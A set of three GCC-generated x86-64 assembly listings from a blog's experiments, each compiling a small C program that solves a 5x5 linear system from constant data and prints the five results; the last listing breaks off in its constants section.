exp/static_c/exp/intel_asm/exp_volatile_a_static_b.s
|
.file "exp_volatile_a_static_b.c"
.section .rodata.str1.1,"aMS",@progbits,1
.LC6:
.string "%f, %f, %f, %f, %f\n"
.section .rodata
.align 32
.LC0:
.long 858993459
.long 1075524403
.long 858993459
.long -1072155853
.long 3435973837
.long -1076048692
.long 171798692
.long 1075880919
.long 1030792151
.long -1071425782
.long 2920577761
.long -1073684153
.long 1717986918
.long -1073060250
.long 171798692
.long 1074045911
.long 2061584302
.long 1074114068
.long 687194767
.long -1072394404
.long 171798692
.long 1075225559
.long 3607772529
.long 1075146915
.long 2576980378
.long -1073374823
.long 1717986918
.long 1074882150
.long 1889785610
.long -1071838659
.long 2920577761
.long 1075306823
.long 1546188227
.long -1072577905
.long 343597384
.long 1070679982
.long 2061584302
.long -1071862252
.long 2233382994
.long 1075335659
.long 2405181686
.long 1075869122
.long 343597384
.long 1072777134
.long 3779571220
.long 1075975290
.long 1374389535
.long 1073815224
.long 1202590843
.long -1071940895
.section .text.unlikely,"ax",@progbits
.LCOLDB7:
.section .text.startup,"ax",@progbits
.LHOTB7:
.p2align 4,,15
.globl main
.type main, @function
main:
.LFB22:
.cfi_startproc
subq $328, %rsp
.cfi_def_cfa_offset 336
movl $.LC0, %esi
movl $25, %ecx
movq %fs:40, %rax
movq %rax, 312(%rsp)
xorl %eax, %eax
leaq 112(%rsp), %rdi
movl $5, %eax
rep movsq
movl $.LC6, %esi
movl $1, %edi
movsd 112(%rsp), %xmm7
movsd 120(%rsp), %xmm5
movsd %xmm7, 72(%rsp)
movsd 128(%rsp), %xmm15
movsd 136(%rsp), %xmm10
movsd 144(%rsp), %xmm7
movsd 152(%rsp), %xmm4
movsd %xmm7, 48(%rsp)
movsd 160(%rsp), %xmm1
movsd 168(%rsp), %xmm9
movsd 176(%rsp), %xmm11
movsd 184(%rsp), %xmm13
movsd 192(%rsp), %xmm0
movsd 200(%rsp), %xmm2
movsd 208(%rsp), %xmm7
movsd 216(%rsp), %xmm12
movsd 224(%rsp), %xmm14
movsd 232(%rsp), %xmm3
movsd %xmm5, 80(%rsp)
movsd 240(%rsp), %xmm6
movsd %xmm4, 88(%rsp)
movsd %xmm0, 96(%rsp)
movsd %xmm3, 104(%rsp)
movsd 248(%rsp), %xmm3
movsd 256(%rsp), %xmm4
movsd 264(%rsp), %xmm0
movsd 272(%rsp), %xmm5
movsd %xmm5, 8(%rsp)
movsd 280(%rsp), %xmm5
movsd %xmm5, (%rsp)
movsd 288(%rsp), %xmm5
movsd 296(%rsp), %xmm8
movsd %xmm5, 16(%rsp)
movsd 304(%rsp), %xmm5
movsd %xmm8, 24(%rsp)
mulsd %xmm0, %xmm8
mulsd %xmm5, %xmm4
mulsd %xmm5, %xmm11
mulsd %xmm5, %xmm6
mulsd %xmm5, %xmm12
subsd %xmm8, %xmm4
movsd 24(%rsp), %xmm8
mulsd %xmm5, %xmm3
mulsd %xmm13, %xmm8
mulsd %xmm5, %xmm7
mulsd %xmm5, %xmm9
mulsd %xmm5, %xmm2
subsd %xmm8, %xmm11
movsd (%rsp), %xmm8
mulsd %xmm5, %xmm1
mulsd %xmm0, %xmm8
mulsd %xmm5, %xmm10
mulsd %xmm5, %xmm15
subsd %xmm8, %xmm6
movsd 16(%rsp), %xmm8
movsd %xmm6, 32(%rsp)
movsd 24(%rsp), %xmm6
mulsd %xmm14, %xmm6
subsd %xmm6, %xmm12
movapd %xmm8, %xmm6
mulsd %xmm0, %xmm6
subsd %xmm6, %xmm3
movapd %xmm8, %xmm6
movsd %xmm3, 40(%rsp)
movapd %xmm8, %xmm3
mulsd %xmm14, %xmm3
movsd 40(%rsp), %xmm8
subsd %xmm3, %xmm7
movapd %xmm8, %xmm3
mulsd %xmm12, %xmm3
mulsd %xmm4, %xmm7
subsd %xmm3, %xmm7
movapd %xmm6, %xmm3
mulsd %xmm13, %xmm3
subsd %xmm3, %xmm9
movapd %xmm8, %xmm3
movsd (%rsp), %xmm8
mulsd %xmm11, %xmm3
movapd %xmm8, %xmm6
mulsd %xmm4, %xmm9
mulsd %xmm13, %xmm6
subsd %xmm3, %xmm9
movapd %xmm8, %xmm3
subsd %xmm6, %xmm1
movapd %xmm15, %xmm8
mulsd %xmm14, %xmm3
mulsd %xmm4, %xmm1
subsd %xmm3, %xmm2
movsd 32(%rsp), %xmm3
mulsd %xmm12, %xmm3
mulsd %xmm4, %xmm2
subsd %xmm3, %xmm2
movapd %xmm2, %xmm3
movsd 32(%rsp), %xmm2
movsd %xmm3, 56(%rsp)
mulsd %xmm11, %xmm2
subsd %xmm2, %xmm1
movapd %xmm3, %xmm2
mulsd %xmm9, %xmm2
mulsd %xmm7, %xmm1
subsd %xmm2, %xmm1
movsd 48(%rsp), %xmm2
movapd %xmm2, %xmm15
movsd %xmm1, 64(%rsp)
movsd 24(%rsp), %xmm1
mulsd %xmm2, %xmm1
subsd %xmm1, %xmm10
movsd .LC1(%rip), %xmm1
mulsd %xmm5, %xmm1
movapd %xmm1, %xmm3
movsd .LC2(%rip), %xmm1
mulsd %xmm0, %xmm1
subsd %xmm1, %xmm3
movsd 16(%rsp), %xmm1
mulsd %xmm2, %xmm1
movsd .LC3(%rip), %xmm2
mulsd %xmm5, %xmm2
subsd %xmm1, %xmm8
movsd 40(%rsp), %xmm1
mulsd %xmm10, %xmm1
mulsd %xmm4, %xmm8
subsd %xmm1, %xmm8
movsd .LC2(%rip), %xmm1
mulsd %xmm14, %xmm1
subsd %xmm1, %xmm2
movapd %xmm12, %xmm1
mulsd %xmm3, %xmm1
mulsd %xmm4, %xmm2
subsd %xmm1, %xmm2
movsd 80(%rsp), %xmm1
mulsd %xmm5, %xmm1
movapd %xmm1, %xmm6
movsd (%rsp), %xmm1
mulsd %xmm15, %xmm1
movsd 56(%rsp), %xmm15
mulsd %xmm8, %xmm15
subsd %xmm1, %xmm6
movsd 32(%rsp), %xmm1
mulsd %xmm10, %xmm1
mulsd %xmm4, %xmm6
subsd %xmm1, %xmm6
mulsd %xmm7, %xmm6
subsd %xmm15, %xmm6
movsd .LC4(%rip), %xmm15
mulsd %xmm5, %xmm15
movapd %xmm15, %xmm1
movsd .LC2(%rip), %xmm15
mulsd 8(%rsp), %xmm0
mulsd %xmm13, %xmm15
mulsd 8(%rsp), %xmm14
mulsd 8(%rsp), %xmm13
subsd %xmm15, %xmm1
movapd %xmm11, %xmm15
mulsd %xmm3, %xmm15
mulsd %xmm4, %xmm1
subsd %xmm15, %xmm1
movapd %xmm9, %xmm15
mulsd %xmm2, %xmm15
mulsd %xmm7, %xmm1
subsd %xmm15, %xmm1
movsd 104(%rsp), %xmm15
mulsd %xmm5, %xmm15
subsd %xmm0, %xmm15
movsd 96(%rsp), %xmm0
mulsd %xmm5, %xmm0
mulsd %xmm15, %xmm12
mulsd %xmm15, %xmm11
subsd %xmm14, %xmm0
movapd %xmm0, %xmm14
movsd .LC5(%rip), %xmm0
mulsd %xmm4, %xmm14
mulsd %xmm5, %xmm0
subsd %xmm12, %xmm14
movsd 88(%rsp), %xmm12
mulsd %xmm5, %xmm12
mulsd %xmm14, %xmm9
subsd %xmm13, %xmm12
movsd 48(%rsp), %xmm13
mulsd %xmm4, %xmm12
subsd %xmm11, %xmm12
movapd %xmm13, %xmm11
mulsd %xmm7, %xmm12
subsd %xmm9, %xmm12
movsd .LC2(%rip), %xmm9
mulsd %xmm13, %xmm9
movsd 8(%rsp), %xmm13
mulsd %xmm13, %xmm11
subsd %xmm9, %xmm0
movapd %xmm10, %xmm9
mulsd %xmm15, %xmm10
mulsd %xmm3, %xmm9
mulsd %xmm4, %xmm0
subsd %xmm9, %xmm0
movapd %xmm8, %xmm9
mulsd %xmm14, %xmm8
mulsd %xmm2, %xmm9
mulsd %xmm7, %xmm0
subsd %xmm9, %xmm0
movapd %xmm6, %xmm9
mulsd %xmm12, %xmm6
mulsd %xmm1, %xmm9
mulsd 64(%rsp), %xmm0
subsd %xmm9, %xmm0
movsd 72(%rsp), %xmm9
mulsd %xmm5, %xmm9
subsd %xmm11, %xmm9
movsd 64(%rsp), %xmm11
mulsd %xmm4, %xmm9
subsd %xmm10, %xmm9
movsd 56(%rsp), %xmm10
mulsd %xmm7, %xmm9
subsd %xmm8, %xmm9
mulsd %xmm11, %xmm9
subsd %xmm6, %xmm9
movsd (%rsp), %xmm6
divsd %xmm9, %xmm0
mulsd %xmm0, %xmm12
mulsd %xmm0, %xmm14
mulsd %xmm0, %xmm15
subsd %xmm12, %xmm1
subsd %xmm14, %xmm2
subsd %xmm15, %xmm3
divsd %xmm11, %xmm1
mulsd %xmm1, %xmm10
mulsd %xmm1, %xmm6
subsd %xmm10, %xmm2
divsd %xmm7, %xmm2
movsd 32(%rsp), %xmm7
mulsd %xmm1, %xmm7
subsd %xmm7, %xmm3
movsd 40(%rsp), %xmm7
mulsd %xmm2, %xmm7
subsd %xmm7, %xmm3
movsd .LC2(%rip), %xmm7
divsd %xmm4, %xmm3
movapd %xmm13, %xmm4
mulsd %xmm0, %xmm4
subsd %xmm4, %xmm7
movapd %xmm7, %xmm4
subsd %xmm6, %xmm4
movsd 16(%rsp), %xmm6
mulsd %xmm2, %xmm6
subsd %xmm6, %xmm4
movsd 24(%rsp), %xmm6
mulsd %xmm3, %xmm6
subsd %xmm6, %xmm4
divsd %xmm5, %xmm4
call __printf_chk
movq 312(%rsp), %rdx
xorq %fs:40, %rdx
jne .L5
xorl %eax, %eax
addq $328, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 8
ret
.L5:
.cfi_restore_state
call __stack_chk_fail
.cfi_endproc
.LFE22:
.size main, .-main
.section .text.unlikely
.LCOLDE7:
.section .text.startup
.LHOTE7:
.section .rodata.cst8,"aM",@progbits,8
.align 8
.LC1:
.long 343597384
.long -1071757394
.align 8
.LC2:
.long 2748779069
.long -1073201808
.align 8
.LC3:
.long 3607772529
.long -1071615837
.align 8
.LC4:
.long 1546188227
.long 1075364495
.align 8
.LC5:
.long 3779571220
.long 1074795642
.ident "GCC: (Ubuntu 5.4.1-2ubuntu1~16.04) 5.4.1 20160904"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 6,498
|
exp/static_c/exp/intel_asm/exp_triangular_matrix.s
|
.file "exp_triangular_matrix.c"
.section .rodata.str1.1,"aMS",@progbits,1
.LC7:
.string "%f, %f, %f, %f, %f\n"
.section .rodata
.align 32
.LC0:
.long 858993459
.long 1075524403
.long 858993459
.long -1072155853
.long 3435973837
.long -1076048692
.long 171798692
.long 1075880919
.long 1030792151
.long -1071425782
.long 2920577761
.long -1073684153
.long 1717986918
.long -1073060250
.long 171798692
.long 1074045911
.long 2061584302
.long 1074114068
.long 687194767
.long -1072394404
.long 171798692
.long 1075225559
.long 3607772529
.long 1075146915
.long 2576980378
.long -1073374823
.long 1717986918
.long 1074882150
.long 1889785610
.long -1071838659
.long 2920577761
.long 1075306823
.long 1546188227
.long -1072577905
.long 343597384
.long 1070679982
.long 2061584302
.long -1071862252
.long 2233382994
.long 1075335659
.long 2405181686
.long 1075869122
.long 343597384
.long 1072777134
.long 3779571220
.long 1075975290
.long 1374389535
.long 1073815224
.long 1202590843
.long -1071940895
.section .text.unlikely,"ax",@progbits
.LCOLDB8:
.section .text.startup,"ax",@progbits
.LHOTB8:
.p2align 4,,15
.globl main
.type main, @function
main:
.LFB22:
.cfi_startproc
subq $440, %rsp
.cfi_def_cfa_offset 448
movl $.LC0, %esi
movl $25, %ecx
movq %fs:40, %rax
movq %rax, 424(%rsp)
xorl %eax, %eax
leaq 224(%rsp), %rdi
movsd .LC1(%rip), %xmm3
rep movsq
movsd %xmm3, 176(%rsp)
movabsq $4616212136052895252, %rax
movl $.LC7, %esi
movsd .LC2(%rip), %xmm3
movl $1, %edi
pxor %xmm9, %xmm9
movsd %xmm3, 184(%rsp)
movsd .LC3(%rip), %xmm3
movsd 224(%rsp), %xmm7
movsd 264(%rsp), %xmm5
movsd %xmm7, 24(%rsp)
movsd 272(%rsp), %xmm7
movsd 304(%rsp), %xmm4
movsd %xmm5, 32(%rsp)
movsd 312(%rsp), %xmm8
movsd %xmm4, 40(%rsp)
movsd 320(%rsp), %xmm6
movsd 344(%rsp), %xmm0
movsd 352(%rsp), %xmm1
movsd 360(%rsp), %xmm13
movsd 368(%rsp), %xmm4
movsd 384(%rsp), %xmm5
movsd %xmm0, 48(%rsp)
movsd %xmm5, 8(%rsp)
movsd 392(%rsp), %xmm5
movsd %xmm3, 192(%rsp)
movapd %xmm5, %xmm0
movsd 400(%rsp), %xmm5
movsd .LC4(%rip), %xmm3
movapd %xmm5, %xmm15
movsd 408(%rsp), %xmm5
movsd %xmm3, 200(%rsp)
movapd %xmm5, %xmm12
movsd 416(%rsp), %xmm5
movsd .LC5(%rip), %xmm3
movq %rax, 128(%rsp)
movabsq $4618655338850743747, %rax
movsd %xmm12, 72(%rsp)
movq %rax, 136(%rsp)
movabsq $-4602554970182894223, %rax
movsd %xmm3, 208(%rsp)
movq %rax, 144(%rsp)
movabsq $-4603162956132589240, %rax
mulsd %xmm5, %xmm4
movq %rax, 152(%rsp)
movapd %xmm12, %xmm10
movabsq $-4609366664619292099, %rax
movapd %xmm5, %xmm12
movq %rax, 160(%rsp)
mulsd %xmm9, %xmm10
movsd %xmm15, 64(%rsp)
movsd 128(%rsp), %xmm3
movl $5, %eax
mulsd %xmm9, %xmm12
movsd %xmm0, 56(%rsp)
movsd 136(%rsp), %xmm11
movsd %xmm3, 80(%rsp)
subsd %xmm10, %xmm4
mulsd %xmm5, %xmm13
movsd 144(%rsp), %xmm2
movsd 152(%rsp), %xmm14
movsd 160(%rsp), %xmm3
mulsd %xmm5, %xmm6
movsd %xmm3, 16(%rsp)
movapd %xmm12, %xmm3
subsd %xmm10, %xmm12
movapd %xmm15, %xmm10
movapd %xmm3, %xmm15
mulsd %xmm9, %xmm0
mulsd %xmm9, %xmm10
mulsd %xmm5, %xmm1
mulsd %xmm5, %xmm8
mulsd %xmm5, %xmm7
subsd %xmm0, %xmm3
subsd %xmm10, %xmm15
mulsd %xmm5, %xmm14
subsd %xmm10, %xmm13
mulsd %xmm5, %xmm2
subsd %xmm10, %xmm6
subsd %xmm0, %xmm1
mulsd %xmm4, %xmm3
movapd %xmm15, %xmm10
movapd %xmm11, %xmm15
movsd %xmm13, 96(%rsp)
subsd %xmm0, %xmm8
mulsd %xmm12, %xmm13
mulsd %xmm4, %xmm6
subsd %xmm0, %xmm7
mulsd %xmm4, %xmm10
movsd %xmm1, 88(%rsp)
mulsd %xmm5, %xmm15
mulsd %xmm12, %xmm1
subsd %xmm13, %xmm6
mulsd %xmm4, %xmm8
subsd %xmm13, %xmm10
mulsd %xmm4, %xmm7
movsd 16(%rsp), %xmm13
subsd %xmm1, %xmm3
movsd 80(%rsp), %xmm0
mulsd %xmm9, %xmm13
subsd %xmm1, %xmm8
subsd %xmm1, %xmm7
movapd %xmm15, %xmm1
mulsd %xmm5, %xmm0
mulsd %xmm6, %xmm3
subsd %xmm13, %xmm14
movsd %xmm8, 104(%rsp)
mulsd %xmm10, %xmm8
subsd %xmm13, %xmm2
mulsd %xmm6, %xmm7
subsd %xmm13, %xmm1
mulsd 8(%rsp), %xmm9
subsd %xmm13, %xmm0
movsd 48(%rsp), %xmm11
movsd %xmm14, 112(%rsp)
mulsd %xmm12, %xmm14
subsd %xmm8, %xmm3
mulsd %xmm4, %xmm2
subsd %xmm8, %xmm7
mulsd %xmm4, %xmm1
mulsd %xmm4, %xmm0
movsd 40(%rsp), %xmm8
subsd %xmm14, %xmm2
mulsd %xmm5, %xmm11
subsd %xmm14, %xmm1
mulsd %xmm5, %xmm8
subsd %xmm14, %xmm0
movsd 24(%rsp), %xmm14
movsd %xmm2, 120(%rsp)
mulsd %xmm10, %xmm2
subsd %xmm9, %xmm11
mulsd %xmm6, %xmm1
subsd %xmm9, %xmm8
mulsd %xmm5, %xmm14
mulsd %xmm6, %xmm0
movapd %xmm2, %xmm15
mulsd %xmm11, %xmm12
subsd %xmm2, %xmm1
movsd 32(%rsp), %xmm2
movapd %xmm14, %xmm13
mulsd %xmm4, %xmm8
mulsd %xmm5, %xmm2
subsd %xmm15, %xmm0
subsd %xmm9, %xmm13
movapd %xmm3, %xmm15
subsd %xmm12, %xmm8
mulsd %xmm1, %xmm15
subsd %xmm9, %xmm2
mulsd %xmm7, %xmm0
mulsd %xmm4, %xmm13
mulsd %xmm8, %xmm10
mulsd %xmm4, %xmm2
subsd %xmm15, %xmm0
subsd %xmm12, %xmm13
subsd %xmm12, %xmm2
mulsd %xmm6, %xmm13
mulsd %xmm6, %xmm2
subsd %xmm10, %xmm13
subsd %xmm10, %xmm2
mulsd %xmm7, %xmm13
mulsd %xmm2, %xmm3
subsd %xmm3, %xmm13
movsd 104(%rsp), %xmm3
divsd %xmm13, %xmm0
mulsd %xmm0, %xmm2
mulsd %xmm0, %xmm8
mulsd %xmm0, %xmm11
subsd %xmm2, %xmm1
movsd 120(%rsp), %xmm2
subsd %xmm8, %xmm2
divsd %xmm7, %xmm1
mulsd %xmm1, %xmm3
subsd %xmm3, %xmm2
movsd 112(%rsp), %xmm3
subsd %xmm11, %xmm3
divsd %xmm6, %xmm2
movsd 88(%rsp), %xmm6
movsd 16(%rsp), %xmm13
mulsd %xmm1, %xmm6
subsd %xmm6, %xmm3
movsd 96(%rsp), %xmm6
mulsd %xmm2, %xmm6
subsd %xmm6, %xmm3
movsd 56(%rsp), %xmm6
mulsd %xmm1, %xmm6
divsd %xmm4, %xmm3
movsd 8(%rsp), %xmm4
mulsd %xmm0, %xmm4
subsd %xmm4, %xmm13
movapd %xmm13, %xmm4
subsd %xmm6, %xmm4
movsd 64(%rsp), %xmm6
mulsd %xmm2, %xmm6
subsd %xmm6, %xmm4
movsd 72(%rsp), %xmm6
mulsd %xmm3, %xmm6
subsd %xmm6, %xmm4
divsd %xmm5, %xmm4
call __printf_chk
movq 424(%rsp), %rdx
xorq %fs:40, %rdx
jne .L5
xorl %eax, %eax
addq $440, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 8
ret
.L5:
.cfi_restore_state
call __stack_chk_fail
.cfi_endproc
.LFE22:
.size main, .-main
.section .text.unlikely
.LCOLDE8:
.section .text.startup
.LHOTE8:
.section .rodata.cst8,"aM",@progbits,8
.align 8
.LC1:
.long 3779571220
.long 1074795642
.align 8
.LC2:
.long 1546188227
.long 1075364495
.align 8
.LC3:
.long 3607772529
.long -1071615837
.align 8
.LC4:
.long 343597384
.long -1071757394
.align 8
.LC5:
.long 2748779069
.long -1073201808
.ident "GCC: (Ubuntu 5.4.1-2ubuntu1~16.04) 5.4.1 20160904"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 8,297
|
exp/static_c/exp/intel_asm/exp_volatile_a_b.s
|
.file "exp_volatile_a_b.c"
.section .rodata.str1.1,"aMS",@progbits,1
.LC6:
.string "%f, %f, %f, %f, %f\n"
.section .rodata
.align 32
.LC0:
.long 858993459
.long 1075524403
.long 858993459
.long -1072155853
.long 3435973837
.long -1076048692
.long 171798692
.long 1075880919
.long 1030792151
.long -1071425782
.long 2920577761
.long -1073684153
.long 1717986918
.long -1073060250
.long 171798692
.long 1074045911
.long 2061584302
.long 1074114068
.long 687194767
.long -1072394404
.long 171798692
.long 1075225559
.long 3607772529
.long 1075146915
.long 2576980378
.long -1073374823
.long 1717986918
.long 1074882150
.long 1889785610
.long -1071838659
.long 2920577761
.long 1075306823
.long 1546188227
.long -1072577905
.long 343597384
.long 1070679982
.long 2061584302
.long -1071862252
.long 2233382994
.long 1075335659
.long 2405181686
.long 1075869122
.long 343597384
.long 1072777134
.long 3779571220
.long 1075975290
.long 1374389535
.long 1073815224
.long 1202590843
.long -1071940895
.section .text.unlikely,"ax",@progbits
.LCOLDB7:
.section .text.startup,"ax",@progbits
.LHOTB7:
.p2align 4,,15
.globl main
.type main, @function
main:
.LFB22:
.cfi_startproc
subq $472, %rsp
.cfi_def_cfa_offset 480
movl $.LC0, %esi
movl $25, %ecx
movq %fs:40, %rax
movq %rax, 456(%rsp)
xorl %eax, %eax
leaq 256(%rsp), %rdi
movabsq $4616212136052895252, %rax
rep movsq
movl $.LC6, %esi
movl $1, %edi
movsd 256(%rsp), %xmm3
movsd 264(%rsp), %xmm5
movsd 272(%rsp), %xmm7
movsd 280(%rsp), %xmm4
movsd %xmm7, 104(%rsp)
movsd 288(%rsp), %xmm7
movsd 296(%rsp), %xmm0
movsd %xmm7, 32(%rsp)
movsd 304(%rsp), %xmm10
movsd 312(%rsp), %xmm9
movsd 320(%rsp), %xmm11
movsd 328(%rsp), %xmm13
movsd 336(%rsp), %xmm2
movsd 344(%rsp), %xmm1
movsd 352(%rsp), %xmm7
movsd 360(%rsp), %xmm12
movsd 368(%rsp), %xmm8
movsd 376(%rsp), %xmm14
movsd %xmm3, 88(%rsp)
movsd 384(%rsp), %xmm6
movsd %xmm5, 96(%rsp)
movsd %xmm4, 112(%rsp)
movsd %xmm2, 128(%rsp)
movsd %xmm8, 8(%rsp)
movsd 392(%rsp), %xmm2
movsd %xmm14, 136(%rsp)
movsd 400(%rsp), %xmm4
movsd %xmm0, 120(%rsp)
movsd 408(%rsp), %xmm0
movsd 416(%rsp), %xmm3
movsd %xmm3, 16(%rsp)
movsd 424(%rsp), %xmm3
movsd 432(%rsp), %xmm5
movsd 440(%rsp), %xmm15
movsd %xmm5, 40(%rsp)
movapd %xmm15, %xmm8
movsd .LC1(%rip), %xmm15
movsd 448(%rsp), %xmm5
movsd %xmm15, 208(%rsp)
movq %rax, 160(%rsp)
movabsq $4618655338850743747, %rax
movsd .LC2(%rip), %xmm15
movq %rax, 168(%rsp)
movabsq $-4602554970182894223, %rax
mulsd %xmm5, %xmm4
movsd %xmm8, 48(%rsp)
movsd %xmm15, 216(%rsp)
movq %rax, 176(%rsp)
movabsq $-4603162956132589240, %rax
movsd .LC3(%rip), %xmm15
movq %rax, 184(%rsp)
mulsd %xmm0, %xmm8
movabsq $-4609366664619292099, %rax
movsd %xmm15, 224(%rsp)
movq %rax, 192(%rsp)
mulsd %xmm5, %xmm11
movsd .LC4(%rip), %xmm15
movl $5, %eax
movsd %xmm3, 24(%rsp)
mulsd %xmm5, %xmm6
movsd %xmm15, 232(%rsp)
subsd %xmm8, %xmm4
mulsd %xmm5, %xmm12
movsd .LC5(%rip), %xmm15
mulsd %xmm5, %xmm2
movsd %xmm15, 240(%rsp)
mulsd %xmm5, %xmm7
movsd 160(%rsp), %xmm15
movsd 168(%rsp), %xmm14
movsd %xmm15, 144(%rsp)
mulsd %xmm5, %xmm9
movsd 176(%rsp), %xmm15
movsd %xmm14, 152(%rsp)
mulsd %xmm5, %xmm1
movsd 184(%rsp), %xmm3
movsd 192(%rsp), %xmm14
movsd 48(%rsp), %xmm8
mulsd %xmm5, %xmm10
mulsd %xmm13, %xmm8
mulsd %xmm5, %xmm3
mulsd %xmm5, %xmm15
subsd %xmm8, %xmm11
movsd 24(%rsp), %xmm8
mulsd %xmm0, %xmm8
subsd %xmm8, %xmm6
movsd 40(%rsp), %xmm8
movsd %xmm6, 56(%rsp)
movsd 48(%rsp), %xmm6
mulsd 8(%rsp), %xmm6
subsd %xmm6, %xmm12
movapd %xmm8, %xmm6
mulsd %xmm0, %xmm6
subsd %xmm6, %xmm2
movapd %xmm8, %xmm6
movsd %xmm2, 64(%rsp)
movsd 8(%rsp), %xmm2
mulsd %xmm8, %xmm2
movsd 64(%rsp), %xmm8
subsd %xmm2, %xmm7
movapd %xmm8, %xmm2
mulsd %xmm12, %xmm2
mulsd %xmm4, %xmm7
subsd %xmm2, %xmm7
movapd %xmm6, %xmm2
movsd 56(%rsp), %xmm6
mulsd %xmm13, %xmm2
subsd %xmm2, %xmm9
movapd %xmm8, %xmm2
movsd 24(%rsp), %xmm8
mulsd %xmm11, %xmm2
mulsd %xmm4, %xmm9
subsd %xmm2, %xmm9
movsd 8(%rsp), %xmm2
mulsd %xmm8, %xmm2
subsd %xmm2, %xmm1
movapd %xmm6, %xmm2
mulsd %xmm12, %xmm2
mulsd %xmm4, %xmm1
subsd %xmm2, %xmm1
movapd %xmm8, %xmm2
mulsd %xmm13, %xmm2
movsd %xmm1, 72(%rsp)
movapd %xmm10, %xmm1
movapd %xmm6, %xmm10
subsd %xmm2, %xmm1
movsd 32(%rsp), %xmm6
mulsd %xmm11, %xmm10
movapd %xmm15, %xmm2
movsd 8(%rsp), %xmm15
mulsd %xmm4, %xmm1
mulsd %xmm14, %xmm15
subsd %xmm10, %xmm1
movsd 72(%rsp), %xmm10
subsd %xmm15, %xmm2
movapd %xmm12, %xmm15
mulsd %xmm9, %xmm10
mulsd %xmm7, %xmm1
mulsd %xmm4, %xmm2
subsd %xmm10, %xmm1
movsd 112(%rsp), %xmm10
mulsd %xmm5, %xmm10
movsd %xmm1, 80(%rsp)
movsd 48(%rsp), %xmm1
mulsd %xmm6, %xmm1
subsd %xmm1, %xmm10
movapd %xmm14, %xmm1
mulsd %xmm0, %xmm1
subsd %xmm1, %xmm3
movsd 104(%rsp), %xmm1
mulsd %xmm5, %xmm1
mulsd %xmm3, %xmm15
movapd %xmm1, %xmm8
movsd 40(%rsp), %xmm1
subsd %xmm15, %xmm2
movsd 96(%rsp), %xmm15
mulsd %xmm6, %xmm1
movsd %xmm14, 96(%rsp)
mulsd %xmm5, %xmm15
mulsd %xmm13, %xmm14
subsd %xmm1, %xmm8
movsd 64(%rsp), %xmm1
movapd %xmm15, %xmm6
mulsd %xmm10, %xmm1
movsd 72(%rsp), %xmm15
mulsd %xmm4, %xmm8
subsd %xmm1, %xmm8
movsd 32(%rsp), %xmm1
mulsd 24(%rsp), %xmm1
mulsd %xmm8, %xmm15
subsd %xmm1, %xmm6
movsd 56(%rsp), %xmm1
mulsd %xmm10, %xmm1
mulsd %xmm4, %xmm6
subsd %xmm1, %xmm6
movsd 152(%rsp), %xmm1
mulsd %xmm5, %xmm1
mulsd %xmm7, %xmm6
subsd %xmm14, %xmm1
movsd 16(%rsp), %xmm14
subsd %xmm15, %xmm6
movapd %xmm11, %xmm15
mulsd %xmm14, %xmm0
mulsd %xmm3, %xmm15
mulsd %xmm4, %xmm1
subsd %xmm15, %xmm1
movapd %xmm9, %xmm15
mulsd %xmm2, %xmm15
mulsd %xmm7, %xmm1
subsd %xmm15, %xmm1
movsd 136(%rsp), %xmm15
mulsd %xmm5, %xmm15
subsd %xmm0, %xmm15
movsd 128(%rsp), %xmm0
mulsd 8(%rsp), %xmm14
mulsd %xmm5, %xmm0
mulsd 16(%rsp), %xmm13
mulsd %xmm15, %xmm12
mulsd %xmm15, %xmm11
subsd %xmm14, %xmm0
movsd 96(%rsp), %xmm14
mulsd %xmm4, %xmm0
subsd %xmm12, %xmm0
movapd %xmm0, %xmm12
movsd 120(%rsp), %xmm0
mulsd %xmm12, %xmm9
mulsd %xmm5, %xmm0
subsd %xmm13, %xmm0
movsd 32(%rsp), %xmm13
mulsd %xmm4, %xmm0
subsd %xmm11, %xmm0
movapd %xmm0, %xmm11
movsd 144(%rsp), %xmm0
mulsd %xmm7, %xmm11
mulsd %xmm5, %xmm0
subsd %xmm9, %xmm11
movapd %xmm13, %xmm9
mulsd 16(%rsp), %xmm13
mulsd %xmm14, %xmm9
subsd %xmm9, %xmm0
movapd %xmm10, %xmm9
mulsd %xmm15, %xmm10
mulsd %xmm3, %xmm9
mulsd %xmm4, %xmm0
subsd %xmm9, %xmm0
movapd %xmm8, %xmm9
mulsd %xmm12, %xmm8
mulsd %xmm2, %xmm9
mulsd %xmm7, %xmm0
subsd %xmm9, %xmm0
movapd %xmm6, %xmm9
mulsd %xmm11, %xmm6
mulsd %xmm1, %xmm9
mulsd 80(%rsp), %xmm0
subsd %xmm9, %xmm0
movsd 88(%rsp), %xmm9
mulsd %xmm5, %xmm9
subsd %xmm13, %xmm9
movsd 72(%rsp), %xmm13
mulsd %xmm4, %xmm9
subsd %xmm10, %xmm9
movsd 80(%rsp), %xmm10
mulsd %xmm7, %xmm9
subsd %xmm8, %xmm9
mulsd %xmm10, %xmm9
subsd %xmm6, %xmm9
movsd 24(%rsp), %xmm6
divsd %xmm9, %xmm0
mulsd %xmm0, %xmm11
mulsd %xmm0, %xmm12
mulsd %xmm0, %xmm15
subsd %xmm11, %xmm1
subsd %xmm12, %xmm2
subsd %xmm15, %xmm3
divsd %xmm10, %xmm1
mulsd %xmm1, %xmm13
mulsd %xmm1, %xmm6
subsd %xmm13, %xmm2
divsd %xmm7, %xmm2
movsd 56(%rsp), %xmm7
mulsd %xmm1, %xmm7
subsd %xmm7, %xmm3
movsd 64(%rsp), %xmm7
mulsd %xmm2, %xmm7
subsd %xmm7, %xmm3
divsd %xmm4, %xmm3
movsd 16(%rsp), %xmm4
mulsd %xmm0, %xmm4
subsd %xmm4, %xmm14
movapd %xmm14, %xmm4
subsd %xmm6, %xmm4
movsd 40(%rsp), %xmm6
mulsd %xmm2, %xmm6
subsd %xmm6, %xmm4
movsd 48(%rsp), %xmm6
mulsd %xmm3, %xmm6
subsd %xmm6, %xmm4
divsd %xmm5, %xmm4
call __printf_chk
movq 456(%rsp), %rdx
xorq %fs:40, %rdx
jne .L5
xorl %eax, %eax
addq $472, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 8
ret
.L5:
.cfi_restore_state
call __stack_chk_fail
.cfi_endproc
.LFE22:
.size main, .-main
.section .text.unlikely
.LCOLDE7:
.section .text.startup
.LHOTE7:
.section .rodata.cst8,"aM",@progbits,8
.align 8
.LC1:
.long 3779571220
.long 1074795642
.align 8
.LC2:
.long 1546188227
.long 1075364495
.align 8
.LC3:
.long 3607772529
.long -1071615837
.align 8
